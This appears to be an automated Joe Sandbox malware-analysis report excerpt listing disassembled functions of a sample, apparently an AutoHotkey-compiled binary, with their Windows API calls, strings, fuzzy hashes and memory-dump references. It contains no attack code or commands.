Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: f1061360d9b2fd9217e9ee9d36f3cf1242a77b751e62a3f17f38d7ddd7a90f7e
Instruction ID: d413081babece3c0f7164e6b66c0a89de7c7ab86fb0c940af5ba0aa72fbf8f4e
Opcode Fuzzy Hash: f1061360d9b2fd9217e9ee9d36f3cf1242a77b751e62a3f17f38d7ddd7a90f7e
Instruction Fuzzy Hash: 8F31F63261464483EB718B16E8507EE72EAF748790F744622F79D87EE4EB38C9458740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140005330 Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 0000000140005340

Part of subcall function 0000000140063E00: GetCurrentDirectoryW.KERNEL32(?,000000014000534D), ref: 0000000140063E1C

Part of subcall function 0000000140005690: FindWindowW.USER32 ref: 000000014000571C

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CurrentDirectoryErrorFindModeWindow
String ID:
API String ID: 2401824476-0
Opcode ID: 4a36543c0361951da01f378bf472b41f5323f9714e295fdfc23f0bf06c73c37e
Instruction ID: 52a9a556d228b3e0d286a6eff281e3ed4261348c8cac3c784bafa64a3fdfa3b1
Opcode Fuzzy Hash: 4a36543c0361951da01f378bf472b41f5323f9714e295fdfc23f0bf06c73c37e
Instruction Fuzzy Hash: 523193B161060581FF5BFB23B8563EB22D1AB5E7E1F940125B72A872F2EE7CC5448711

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400562E3 Relevance: 1.5, APIs: 1, Instructions: 28windowtimeCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32 ref: 000000014005687A
SendMessageTimeoutW.USER32 ref: 00000001400568F4
PostMessageW.USER32 ref: 0000000140056925
PostMessageW.USER32 ref: 0000000140056977
SendMessageTimeoutW.USER32 ref: 00000001400569AC

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Message$PostSendTimeout$ProcWindow
String ID:
API String ID: 2241355032-0
Opcode ID: 962776bd2b70b89a195ae22277df7f23fa898e6a6c57831838e9cc32943eef62
Instruction ID: 6a6a3029de623b57e0693df95bab4057e67219e1ee92d066cde79186f792176d
Opcode Fuzzy Hash: 962776bd2b70b89a195ae22277df7f23fa898e6a6c57831838e9cc32943eef62
Instruction Fuzzy Hash: 45F08C3130868085EAB7DB23A5047EA6354F76CFD4F480152EF49177B8CE39C882C701

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005628F Relevance: 1.5, APIs: 1, Instructions: 27windowtimeCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32 ref: 000000014005687A
SendMessageTimeoutW.USER32 ref: 00000001400568F4
PostMessageW.USER32 ref: 0000000140056925
PostMessageW.USER32 ref: 0000000140056977
SendMessageTimeoutW.USER32 ref: 00000001400569AC

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Message$PostSendTimeout$ProcWindow
String ID:
API String ID: 2241355032-0
Opcode ID: 306b486a6e4f5f584901ecab84ea525f50a0f4d2d343f50411875b64e848ffb5
Instruction ID: 4046fdaf443aaa27a737ac7e4dc28361eeb7e28d259f6e56eb21dda421668644
Opcode Fuzzy Hash: 306b486a6e4f5f584901ecab84ea525f50a0f4d2d343f50411875b64e848ffb5
Instruction Fuzzy Hash: D8F0E231224A8494E7A6CB33A8043EA3311F74CBE4F840602DF59537F4CE35C482C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140056310 Relevance: 1.5, APIs: 1, Instructions: 27windowtimeCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32 ref: 000000014005687A
SendMessageTimeoutW.USER32 ref: 00000001400568F4
PostMessageW.USER32 ref: 0000000140056925
PostMessageW.USER32 ref: 0000000140056977
SendMessageTimeoutW.USER32 ref: 00000001400569AC

Part of subcall function 00000001400A3180: DrawIconEx.USER32 ref: 00000001400A3228

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Message$PostSendTimeout$DrawIconProcWindow
String ID:
API String ID: 2027319081-0
Opcode ID: 7cb36dc2b67cea4e94318d7b87ca2db0f1f965500dcd54628d2dac5b9202af8b
Instruction ID: 8114fbce3a2cbac3f61916c145bd570f0dbb11ef0dd9a2c1751900e5e3f6d33e
Opcode Fuzzy Hash: 7cb36dc2b67cea4e94318d7b87ca2db0f1f965500dcd54628d2dac5b9202af8b
Instruction Fuzzy Hash: 23F08C3120868095EAB6DB23A5047EA6354F76CFD4F480152EF48177B8DE39C882C701

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005623B Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32 ref: 000000014005687A

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: ProcWindow
String ID:
API String ID: 181713994-0
Opcode ID: af2556c1c4a3fcd6370310f7a3c0e1890992a86b3e36e4ba8b75566f47ac8c96
Instruction ID: de203f2d6380d9ade8639fd80037dc82e1eb433435b73b6210ce75ccb08005eb
Opcode Fuzzy Hash: af2556c1c4a3fcd6370310f7a3c0e1890992a86b3e36e4ba8b75566f47ac8c96
Instruction Fuzzy Hash: 64F0A936220A88C5D6A2DB13E8047DA6321F74CBE8F844412DF4813738CE34C88ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140056B19 Relevance: 1.5, APIs: 1, Instructions: 21windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004EE0: GetTickCount.KERNEL32 ref: 0000000140004F18

PostMessageW.USER32 ref: 0000000140056B32

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountMessagePostTick
String ID:
API String ID: 1233319983-0
Opcode ID: dabdce3e6011770a8e8c5aa4f163d86c6325093ce6dfb0199455a7cb58cc46fd
Instruction ID: 850e2b969b4af13a5fe241fb242660a5b98fef7013203b161bc82ae507039932
Opcode Fuzzy Hash: dabdce3e6011770a8e8c5aa4f163d86c6325093ce6dfb0199455a7cb58cc46fd
Instruction Fuzzy Hash: 08E04F36314A81C4D7A6DA63A4043DA5315F74CBD4F584452EF8953765DE35C846C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400AA8C0 Relevance: 1.3, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00000001400AA8DB

Part of subcall function 00000001400CA9A4: _FF_MSGBANNER.LIBCMT ref: 00000001400CA9D4
Part of subcall function 00000001400CA9A4: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400D0AA0,?,?,00000000,00000001400CF2DD,?,?,?,00000001400CF387,?,?,00000000,00000001400CE775), ref: 00000001400CA9F9
Part of subcall function 00000001400CA9A4: _callnewh.LIBCMT ref: 00000001400CAA12
Part of subcall function 00000001400CA9A4: _errno.LIBCMT ref: 00000001400CAA1D
Part of subcall function 00000001400CA9A4: _errno.LIBCMT ref: 00000001400CAA28

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: _errno$AllocateHeap_callnewhmalloc
String ID:
API String ID: 2243056865-0
Opcode ID: fcfc9a1df6e0bc85991b3739faf1ac6917ddc8aaf1b220a586ab12618ba77058
Instruction ID: f2304afc234d0af73b631e82f941105809edbec6a10e5977796ee8e5d2770dea
Opcode Fuzzy Hash: fcfc9a1df6e0bc85991b3739faf1ac6917ddc8aaf1b220a586ab12618ba77058
Instruction Fuzzy Hash: C8F01D32B046458AEF95CB2AE08436D63A5E798F98F199125EB4947399DB3CC8D1CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400AA490 Relevance: 1.3, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00000001400CBD40: malloc.LIBCMT ref: 00000001400CBD5A

malloc.LIBCMT ref: 00000001400AA4B5

Part of subcall function 00000001400CA9A4: _FF_MSGBANNER.LIBCMT ref: 00000001400CA9D4
Part of subcall function 00000001400CA9A4: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400D0AA0,?,?,00000000,00000001400CF2DD,?,?,?,00000001400CF387,?,?,00000000,00000001400CE775), ref: 00000001400CA9F9
Part of subcall function 00000001400CA9A4: _callnewh.LIBCMT ref: 00000001400CAA12
Part of subcall function 00000001400CA9A4: _errno.LIBCMT ref: 00000001400CAA1D
Part of subcall function 00000001400CA9A4: _errno.LIBCMT ref: 00000001400CAA28

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: _errnomalloc$AllocateHeap_callnewh
String ID:
API String ID: 2444859684-0
Opcode ID: bb976d4ef410dca56b34cfdf591ad2465a6126ab175f72c8351aeb2425df3519
Instruction ID: e2880a8f70938640a6b8e2652e2984d0e9c2f9ce974f6fc9e338832027b52159
Opcode Fuzzy Hash: bb976d4ef410dca56b34cfdf591ad2465a6126ab175f72c8351aeb2425df3519
Instruction Fuzzy Hash: 76F0C03164270481FB5F9B67A4653A521D4EB9DB84F080178AF8D4B3E6EF7C84D19750

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00000001400620E0 Relevance: 34.1, APIs: 10, Strings: 9, Instructions: 824comCOMMON

Download Yara Rule

APIs

_wcstoi64.LIBCMT ref: 0000000140062186
CoCreateInstance.OLE32 ref: 0000000140062221
powf.LIBCMT ref: 0000000140062539
powf.LIBCMT ref: 0000000140062554
powf.LIBCMT ref: 0000000140062578
free.LIBCMT ref: 00000001400629B7
malloc.LIBCMT ref: 00000001400629CD
free.LIBCMT ref: 0000000140062CBC
malloc.LIBCMT ref: 0000000140062CCE

Strings

Can't Get Current Setting, xrefs: 0000000140062739
Can't Change Setting, xrefs: 0000000140062740
Out of memory., xrefs: 0000000140062A98, 0000000140062D35
Mixer Doesn't Support This Component Type, xrefs: 000000014006241E
Mixer Doesn't Have That Many of That Component Type, xrefs: 000000014006226D, 0000000140062417
Memory limit reached (see #MaxMem in the help file)., xrefs: 0000000140062828, 0000000140062B20
Can't Open Specified Mixer, xrefs: 0000000140062247
Component Doesn't Support This Control Type, xrefs: 000000014006228F, 0000000140062437
Off, xrefs: 0000000140062A46

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: powf$freemalloc$CreateInstance_wcstoi64
String ID: Can't Change Setting$Can't Get Current Setting$Can't Open Specified Mixer$Component Doesn't Support This Control Type$Memory limit reached (see #MaxMem in the help file).$Mixer Doesn't Have That Many of That Component Type$Mixer Doesn't Support This Component Type$Off$Out of memory.
API String ID: 545791434-609076530
Opcode ID: 69389a3793f774edd0ab6d34e24db7eb0e4adae349bfea579473de0e9614bf4d
Instruction ID: 2e357812908c0d0d025c1239dd5bd0c6286d786cf705c47e361058ee705a81ad
Opcode Fuzzy Hash: 69389a3793f774edd0ab6d34e24db7eb0e4adae349bfea579473de0e9614bf4d
Instruction Fuzzy Hash: 1482BF32604E8496EB639F26D8447E823A2FB5D7D4F258A02FB4D27BB5DB34C595C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008E1C0 Relevance: 19.8, APIs: 9, Strings: 2, Instructions: 506COMMON

Download Yara Rule

Strings

Out of memory., xrefs: 000000014008E5FF, 000000014008F0F0, 000000014008F100
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014008E344, 000000014008ECA3

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 0-457448710
Opcode ID: 2fa3e6d679b0da51a55582568660f70707e723a2b74c822d84b409da99b8a8c1
Instruction ID: d562a6c9ef44c4e4d2445b5d0b63b34a53220fc79aaadae7069a897203f343d0
Opcode Fuzzy Hash: 2fa3e6d679b0da51a55582568660f70707e723a2b74c822d84b409da99b8a8c1
Instruction Fuzzy Hash: 7F32BD73204B8081FB278B27E4443EA67A1F74DBD8F505212EB5A17BB5EB38CA95D740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400BE0A0 Relevance: 17.2, Strings: 13, Instructions: 941COMMON

Download Yara Rule

Strings

$, xrefs: 00000001400BEC97
BSR_ANYCRLF), xrefs: 00000001400BE4EB
UTF16), xrefs: 00000001400BE1CA
ANY), xrefs: 00000001400BE41B
UCP), xrefs: 00000001400BE22D
no error, xrefs: 00000001400BEE4F
LF), xrefs: 00000001400BE34B
BSR_UNICODE), xrefs: 00000001400BE530
Error text not found (please report), xrefs: 00000001400BEE78
NO_START_OPT), xrefs: 00000001400BE28A
ANYCRLF), xrefs: 00000001400BE47D
CRLF), xrefs: 00000001400BE3AD
CR), xrefs: 00000001400BE2DE

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$Error text not found (please report)$LF)$NO_START_OPT)$UCP)$UTF16)$no error
API String ID: 0-3688278424
Opcode ID: 77db81d414183aaf20a356922eaab2ca028f9a30755bfd6d5a037830ced2926e
Instruction ID: ca81032d6f157d4f7278efd0ea6399c65db1b0fb0da84bbd9cb3b3510297b97a
Opcode Fuzzy Hash: 77db81d414183aaf20a356922eaab2ca028f9a30755bfd6d5a037830ced2926e
Instruction Fuzzy Hash: 51829D72614F948AE7668FA6D4403EE37F4F758798F504126FB4A8B7A4EB78C944CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400201B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 309timeCOMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNEL32 ref: 0000000140020307
GetSystemTimeAsFileTime.KERNEL32 ref: 0000000140020662

Strings

Out of memory., xrefs: 000000014002069A
Memory limit reached (see #MaxMem in the help file)., xrefs: 0000000140020472
ErrorLevel, xrefs: 00000001400203C5

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Time$CurrentDirectoryFileSystem
String ID: ErrorLevel$Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 2903961910-844184505
Opcode ID: c33519dd18e401127068821e514c1796dc481b2ced9d9bc905dbf7b530576852
Instruction ID: e452918c816160f1add320c16c544f1ae885b40aed19fbf002c5833744c660ac
Opcode Fuzzy Hash: c33519dd18e401127068821e514c1796dc481b2ced9d9bc905dbf7b530576852
Instruction Fuzzy Hash: 69E17B71200B5482FB669B27E4587E963A1E78CBD8F48411AEF4E5B7B6DF38C845C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003A095 Relevance: 9.4, APIs: 2, Strings: 4, Instructions: 448COMMON

Download Yara Rule

Strings

., xrefs: 000000014003A1BD
, xrefs: 000000014003A334
, xrefs: 000000014003A1AA
., xrefs: 000000014003A34D

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: $ $.$.
API String ID: 2959964966-1066414380
Opcode ID: a62da00c069738e4583b5200607d2fa3bbcbab8ad500624de1b3c4d03651acd4
Instruction ID: f2b7b8148c2cedaa663370146d2f5a31c80abbfc9ca1e3ed00a4447fe0fa73ee
Opcode Fuzzy Hash: a62da00c069738e4583b5200607d2fa3bbcbab8ad500624de1b3c4d03651acd4
Instruction Fuzzy Hash: 9702A031A0525081FABB5A0BA4513FB63D1A79FBC0F448026FF9A577F4EA7DCC828210

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004C050 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 240windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140067BB0: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,0000000140048AE2), ref: 0000000140067BE3
Part of subcall function 0000000140067BB0: IsWindowVisible.USER32 ref: 0000000140067C04

SendMessageTimeoutW.USER32 ref: 000000014004C0CD

Strings

Out of memory., xrefs: 000000014004C3C8
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014004C18F

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Window$ForegroundMessageSendTimeoutVisible
